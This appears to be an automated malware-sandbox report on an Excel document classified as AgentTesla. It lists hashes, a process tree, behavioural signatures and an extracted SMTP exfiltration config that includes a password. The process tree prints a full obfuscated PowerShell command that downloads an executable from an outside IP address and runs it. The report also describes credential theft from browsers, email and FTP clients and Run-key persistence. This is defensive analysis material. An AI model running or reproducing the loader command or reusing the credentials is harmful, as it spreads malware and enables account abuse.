Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
20/07/2024, 09:55
Static task
static1
Behavioral task
behavioral1
Sample
5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls
Resource
win10v2004-20240709-en
General
-
Target
5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls
-
Size
118KB
-
MD5
b363a9de28fa08d52fd1bcbe66b62177
-
SHA1
4d76d82d397c088d68038414bcc945c7e62fef9f
-
SHA256
5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d
-
SHA512
ecbc3d03d4c30a1d85ecbde1fdbc262c41e90743117d9f407676eaf03ee61fdd227699e4b4adcbc0aa15856b1c85dee5f2fd66548aa96c9f56306da424fe670c
-
SSDEEP
1536:HtZjb5CNvDUyPILbqcH1pxt3HrsbDMTXLMEBun3OJdvc3hZPGgqGa:HPj9cgBbq6xtXIbYwEQ3OnvWHPG
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
us2.smtp.mailhostbox.com - Port:
587 - Username:
[email protected] - Password:
Password: rB^PG*h 6. - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 11 2860 mshta.exe 13 2636 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 1044 winiti.exe 2432 winiti.exe -
Loads dropped DLL 1 IoCs
pid Process 2636 powershell.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\mpTrle = "C:\\Users\\Admin\\AppData\\Roaming\\mpTrle\\mpTrle.exe" winiti.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 api.ipify.org 15 api.ipify.org 16 ip-api.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1044 set thread context of 2432 1044 winiti.exe 40 -
Detected phishing page
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3048 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2636 powershell.exe 2636 powershell.exe 2636 powershell.exe 1044 winiti.exe 1044 winiti.exe 2432 winiti.exe 2432 winiti.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 1044 winiti.exe Token: SeDebugPrivilege 2432 winiti.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3048 EXCEL.EXE 3048 EXCEL.EXE 3048 EXCEL.EXE 3048 EXCEL.EXE 3048 EXCEL.EXE -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 2860 wrote to memory of 2772 2860 mshta.exe 33 PID 2860 wrote to memory of 2772 2860 mshta.exe 33 PID 2860 wrote to memory of 2772 2860 mshta.exe 33 PID 2860 wrote to memory of 2772 2860 mshta.exe 33 PID 2772 wrote to memory of 2636 2772 cmd.exe 35 PID 2772 wrote to memory of 2636 2772 cmd.exe 35 PID 2772 wrote to memory of 2636 2772 cmd.exe 35 PID 2772 wrote to memory of 2636 2772 cmd.exe 35 PID 2636 wrote to memory of 1588 2636 powershell.exe 36 PID 2636 wrote to memory of 1588 2636 powershell.exe 36 PID 2636 wrote to memory of 1588 2636 powershell.exe 36 PID 2636 wrote to memory of 1588 2636 powershell.exe 36 PID 1588 wrote to memory of 1732 1588 csc.exe 37 PID 1588 wrote to memory of 1732 1588 csc.exe 37 PID 1588 wrote to memory of 1732 1588 csc.exe 37 PID 1588 wrote to memory of 1732 1588 csc.exe 37 PID 2636 wrote to memory of 1044 2636 powershell.exe 39 PID 2636 wrote to memory of 1044 2636 powershell.exe 39 PID 2636 wrote to memory of 1044 2636 powershell.exe 39 PID 2636 wrote to memory of 1044 2636 powershell.exe 39 PID 1044 wrote to memory of 2432 1044 winiti.exe 40 PID 1044 wrote to memory of 2432 1044 winiti.exe 40 PID 1044 wrote to memory of 2432 1044 winiti.exe 40 PID 1044 wrote to memory of 2432 1044 winiti.exe 40 PID 1044 wrote to memory of 2432 1044 winiti.exe 40 PID 1044 wrote to memory of 2432 1044 winiti.exe 40 PID 1044 wrote to memory of 2432 1044 winiti.exe 40 PID 1044 wrote to memory of 2432 1044 winiti.exe 40 PID 1044 wrote to memory of 2432 1044 winiti.exe 40
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3048
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'JG8wOVNaYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZXJEZUZJTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElpU1Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtCcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb29PTE95Q0wsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZd2N2ZEVGWldDLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcmRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhUUFrbXpIRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVEhRRm56RnpmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG8wOVNaYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNC4xNzkvNTE1L3dpbml0aS5leGUiLCIkRU52OkFQUERBVEFcd2luaXRpLmV4ZSIsMCwwKTtTVGFyVC1zTGVFcCgzKTtzVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdpbml0aS5leGUi'+[chAR]34+'))')))"2⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'JG8wOVNaYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZXJEZUZJTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElpU1Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtCcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb29PTE95Q0wsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZd2N2ZEVGWldDLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcmRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhUUFrbXpIRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVEhRRm56RnpmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG8wOVNaYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNC4xNzkvNTE1L3dpbml0aS5leGUiLCIkRU52OkFQUERBVEFcd2luaXRpLmV4ZSIsMCwwKTtTVGFyVC1zTGVFcCgzKTtzVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdpbml0aS5leGUi'+[chAR]34+'))')))"3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8up2kuy1.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9D3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE9D2.tmp"5⤵PID:1732
-
-
-
C:\Users\Admin\AppData\Roaming\winiti.exe"C:\Users\Admin\AppData\Roaming\winiti.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Users\Admin\AppData\Roaming\winiti.exe"C:\Users\Admin\AppData\Roaming\winiti.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK27LCMU\bqrp4j[1].htm
Filesize75B
MD5f5aa5c15ce9558011d53a5b7700f8209
SHA1082c8304d8093782c6036151672e903e0715a869
SHA2568f2b99b41702d67ec68678a193cf21e7be375e6f8552b3673d4b8adf3cd86fe9
SHA512530dc5cf8f0b5b2988aa35e91dc35995a434dc8e82bbacea5635c5cb876e0b8cc1596300327cf6d495acd27b10cc366c5ce152033aa9cb2d929efe5a7810805a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z2D3H3V6\bqrp4j[1].htm
Filesize168B
MD5d57e3a550060f85d44a175139ea23021
SHA12c5cb3428a322c9709a34d04dd86fe7628f8f0a6
SHA25643edf068d34276e8ade4113d4d7207de19fc98a2ae1c07298e593edae2a8774c
SHA5120364fe6a010fce7a3f4a6344c84468c64b20fd131f3160fc649db78f1075ba52d8a1c4496e50dbe27c357e01ee52e94cdcda8f7927cba28d5f2f45b9da690063
-
Filesize
3KB
MD5205e27169156054632cc11269357c59c
SHA1c4c9b6100486e022c8778b71573c6621d21e1ed8
SHA256ff5ba91a96c64607e62146c1cd4a2a7b66a0633b00e0ec8037603030feffcf12
SHA51230f7939ce8377eb3cbc9b69fe665024f3c454a343bd5c5f96983ff41491b6224d46cfa47e3dd561ca5825a81854d187b41069dd08c9f84cce85fb4c051625505
-
Filesize
7KB
MD52ec3684debec23ce3620a183635b6e1e
SHA183ee7ea91d4cb875f41e0806d085a7f313ea9b34
SHA2566e6d1ece8e3d1495752af7121c0583a70c7c75f64a4f781b061313862e629751
SHA512051867259773a466dd1837b07fc53d345d18bc24c7860bf718ef951266f6806758682c541282e48fd964be3385070c3a726935bb73699d5bd5b917de2119c0f4
-
Filesize
1KB
MD58c5ef15d9ff9a902c87ce02dc3b53bc8
SHA147e203a63ae42cc9e089babcad96c938232ffe7a
SHA2565c70642b95a26f7d5bca2432ea24ee7b41f2eacbdab6a7ae0e303f9fbe2915aa
SHA5125abde99629f366ac9315d174319498fb51e9dd856a7ff89fc7215b0f3e94c2dac402c510ad21bf0a2a4774e652863efa63aa51e68e517e4f57cf45d0a29b6162
-
Filesize
906KB
MD5f077adcb2d6ea5208dc2b37f94d21fc8
SHA12fd52d3fb6b982bb64afd1165836f911ac82a40e
SHA2566af79d96f93fecf5182be2b0dbadb8a0874fb4bcdded73478252ccec2f48f05f
SHA51281a3b1416e9780b2c25ab381742ebac09200932d7b21fd8546f4d455439e5c1bbdac7c3faff9f48945064c04b941d1c237dba55d53687445d456a855bce0dd07
-
Filesize
468B
MD57734075c50835dd0aa579997b1feacfd
SHA1b2b42485dfcf88999d6780c0f1aa88e638081515
SHA2569ef8ccd491530f4be74ad14c37d6c10b340045ac58c8bf65cc41c0766552a0e3
SHA5120350ef6f6c01260409dbda7da5a3873b5ee760d02c93c98cb8b6415685b5a4d37013b5c0822e8b85a85b8d14df7224a9b9d3f7d1145330f795a7c9be682ae82e
-
Filesize
309B
MD5b8846de9d7dc1ad32e3cdd3b70cda506
SHA1eaba4994e87638e36e64b1d8ae40ab82acc3de2e
SHA25623679c623b8659c2300cbb1af381d95bbac3b204a3975c7c83ca44abc8d94f9a
SHA5129f3d460b553826850a3ef2eed873f5529840878f7eba19bd12f2d7d0d3fc12a39cab1c93bf3f2a8ff4dcab6b62fce5c589ccfc30d953fc1c3fa9d2267a97620e
-
Filesize
652B
MD528fd46d577ed4f3e89d0718c11e4d23e
SHA10bdce8b570158912d1202cd7ae688d6a1a7e7235
SHA256bc73dbc0d4d46ea14bd657a14561b06a6d3f8b1b89c3857fe80b96eab2bc78f7
SHA512d80340864cbb27a0d6b9180d9955a66a09825dd7cb160058d4f832b74cc27465e9b4fb22346ec43df56644c7457d4aede85d13c03b56dc2e7d0f7d119c69ae89